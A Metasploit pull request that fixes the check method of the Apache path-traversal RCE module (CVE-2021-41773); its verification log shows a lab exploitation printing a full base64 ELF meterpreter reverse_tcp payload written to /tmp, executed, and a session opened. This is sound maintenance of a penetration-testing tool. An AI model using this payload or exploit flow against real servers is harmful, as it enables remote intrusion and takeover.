### PR TITLE
Fix apache_normalize_path_rce check method

### DIFF
--- a/modules/exploits/multi/http/apache_normalize_path_rce.rb
+++ b/modules/exploits/multi/http/apache_normalize_path_rce.rb
@@ -42,7 +42,6 @@ class MetasploitModule < Msf::Exploit::Remote
         'Arch' => [ARCH_CMD, ARCH_X64, ARCH_X86],
         'DefaultOptions' => {
           'CheckModule' => 'auxiliary/scanner/http/apache_normalize_path',
-          'Action' => 'CHECK_RCE',
           'RPORT' => 443,
           'SSL' => true
         },
@@ -86,6 +85,12 @@ class MetasploitModule < Msf::Exploit::Remote
       OptInt.new('DEPTH', [true, 'Depth for Path Traversal', 5]),
       OptString.new('TARGETURI', [true, 'Base path', '/cgi-bin'])
     ])
+  end
+
+  def check_options
+    {
+      'Action' => 'CHECK_RCE'
+    }
   end
 
   def cmd_unix_generic?


### PR DESCRIPTION
Fixes a bug in apache_normalize_path_rce's check method via the RPC interface

## Verification

Set up a target for RCE

https://github.com/rapid7/metasploit-framework/blob/2dce73833f6d8d458ed789a4a4b8a2a91c28bd47/documentation/modules/auxiliary/scanner/http/apache_normalize_path.md?plain=1#L24-L30

- Ensure the module works via Metasploit console:

```
msf6 exploit(multi/http/apache_normalize_path_rce) > rerun rhost=192.168.123.1 lhost=192.168.123.1 rport=8080 ssl=false cve=CVE-2021-41773 
[*] Reloading module...

[*] Started reverse TCP handler on 192.168.123.1:4444 
[*] Using auxiliary/scanner/http/apache_normalize_path as check
[+] http://192.168.123.1:8080 - The target is vulnerable to CVE-2021-41773 (mod_cgi is enabled).
[*] Scanned 1 of 1 hosts (100% complete)
[*] http://192.168.123.1:8080 - Attempt to exploit for CVE-2021-41773
[*] http://192.168.123.1:8080 - Sending linux/x64/meterpreter/reverse_tcp command payload
[*] http://192.168.123.1:8080 - Generated command payload: echo f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+gAAAAAAAAB8AQAAAAAAAAAQAAAAAAAAMf9qCViZthBIidZNMclqIkFaagdaDwVIhcB4UWoKQVlQailYmWoCX2oBXg8FSIXAeDtIl0i5AgARXMCoewFRSInmahBaaipYDwVZSIXAeSVJ/8l0GFdqI1hqAGoFSInnSDH2DwVZWV9IhcB5x2o8WGoBXw8FXmp+Wg8FSIXAeO3/5g== | base64 -d > /tmp/SzoTkiR; chmod +x /tmp/SzoTkiR; /tmp/SzoTkiR; rm -f /tmp/SzoTkiR
[*] Transmitting intermediate stager...(126 bytes)
[*] Sending stage (3045380 bytes) to 192.168.123.1
[*] Meterpreter session 12 opened (192.168.123.1:4444 -> 192.168.123.1:49301) at 2024-05-01 20:06:43 +0100
```

Ensure the module works via RPC (i.e. Metasploit Pro)

![image](https://github.com/rapid7/metasploit-framework/assets/60357436/2da740f2-277f-42a2-b22c-05618676d9c1)

### Before

Check method failed, because the `CHECK_RCE` method wasn't defaulted correctly for the `CheckModule` method to work

![image](https://github.com/rapid7/metasploit-framework/assets/60357436/46e45031-4e6e-4d2c-94d3-fc40687f17c9)

### After

Session opened

![image](https://github.com/rapid7/metasploit-framework/assets/60357436/9bf5dbbd-5aa0-4bac-a01c-1debada34a0c)
